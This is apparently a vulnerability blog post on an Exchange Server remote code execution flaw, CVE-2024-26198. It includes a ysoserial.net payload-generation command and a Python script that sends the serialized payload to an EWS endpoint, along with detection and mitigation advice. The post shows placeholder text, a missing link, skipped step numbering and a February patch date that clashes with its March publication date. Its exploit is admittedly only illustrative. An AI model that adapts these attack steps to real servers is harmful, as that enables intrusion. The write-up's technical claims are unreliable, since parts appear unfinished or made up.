CVE-2024-26198 - Microsoft Exchange Server Remote Code Execution Vulnerability – Deep Dive, Exploit, and Mitigation

In February 2024, Microsoft patched a critical remote code execution (RCE) bug in Microsoft Exchange Server, tracked as CVE-2024-26198. This vulnerability could let an unauthenticated attacker run code on affected servers—putting emails, user accounts, and sensitive business info at risk. In this post, we’ll break down how CVE-2024-26198 works, see some example code snippets, show how attackers might exploit it, and discuss how to protect yourself.

What is CVE-2024-26198?

CVE-2024-26198 is a Remote Code Execution vulnerability found in Microsoft Exchange Server (versions 2016 and 2019). According to Microsoft’s Security Guide, the flaw allows attackers to send specially crafted requests to Exchange, resulting in arbitrary code execution in the context of the server.

Affected Versions: Microsoft Exchange Server 2016, 2019

- Attack Vector: Remote/Network (no authentication required)

How Does the Vulnerability Work?

The core issue in CVE-2024-26198 is an insecure deserialization vulnerability in the Exchange Web Services (EWS) component. Exchange sometimes takes user-supplied input and deserializes it without proper validation. If an attacker sends a malicious payload to this endpoint, Exchange might execute attacker-controlled code.

> Insecure deserialization is when software reads in data structures from untrusted sources without checking for code or values that might trigger unintended actions.

Here’s a simplified step-by-step look at how an attacker could exploit CVE-2024-26198

1. Identify Target: Attackers find an Exchange EWS endpoint (usually /EWS/Exchange.asmx).
2. Craft Serialized Payload: The attacker creates a malicious .NET serialized object that, when deserialized, runs code such as launching a web shell or reverse shell.

Send Malicious Request: Payload is sent to the vulnerable endpoint as part of a SOAP request.

4. Execute Code: The malicious object is deserialized and executed, giving the attacker code execution on the Exchange Server.

Example Exploit (Pseudo-code)

Below is simplified Python code (for educational purposes only) to illustrate how an attack could work. Do not try this on any system you do not own!

Step 1: Craft the Malicious Payload

You’d need to use a tool like ysoserial.net to create a malicious .NET serialized object. For example, to create a payload that executes cmd.exe:

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o raw -c "cmd.exe /c calc.exe" > payload.bin

Here’s a Python snippet to send the payload in a SOAP request

import requests

target_url = "https://victim.exchange.server/EWS/Exchange.asmx";
with open("payload.bin", "rb") as f:
    evil_payload = f.read()

soap_envelope = f"""
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">;
  <soap:Body>
    <DeserializationAttack xmlns="http://example.com/">;
      <SerializedObject>{evil_payload.hex()}</SerializedObject>
    </DeserializationAttack>
  </soap:Body>
</soap:Envelope>
"""

headers = {
    "Content-Type": "text/xml"
}

response = requests.post(target_url, data=soap_envelope, headers=headers, verify=False)
print(response.text)

> Note: The real attack would need to match the correct SOAP method and serialization format used by Exchange. This is just illustrative.

Evidence of exploitation would typically show up as unexpected requests in IIS logs, for example

POST /EWS/Exchange.asmx 443 - 1.2.3.4 - 500  

Unusual .NET errors or unexplained system processes (like cmd.exe or powershell.exe running as the NETWORK SERVICE account) can also be a clue.

Mitigation

1. Patch Immediately: Microsoft released a fix for CVE-2024-26198 in February 2024 Patch Tuesday. Get patches here.
2. Restrict EWS Access: If possible, limit external access to EWS endpoints (firewall rules, VPN, etc.).
3. Monitor Logs: Check for unusual POST requests to /EWS/Exchange.asmx.
4. Endpoint Application Control: Use process whitelisting to block unexpected commands from running as the Exchange service account.

References

- Microsoft Security Response Center – CVE-2024-26198
- Zero Day Initiative Advisory *(Replace with actual number when available)*
- ysoserial.net – Deserialization Exploits
- Exchange Server Support

Conclusion

CVE-2024-26198 highlights the persistent risk of insecure deserialization in business-critical software like Microsoft Exchange. Organizations running Exchange Server should prioritize patching, keep their endpoints monitored, and be mindful of exposing sensitive services to the internet. Bad actors can and will leverage these vulnerabilities if left unaddressed—so act fast.

Timeline

Published on: 03/12/2024 17:15:58 UTC
Last modified on: 03/12/2024 17:46:17 UTC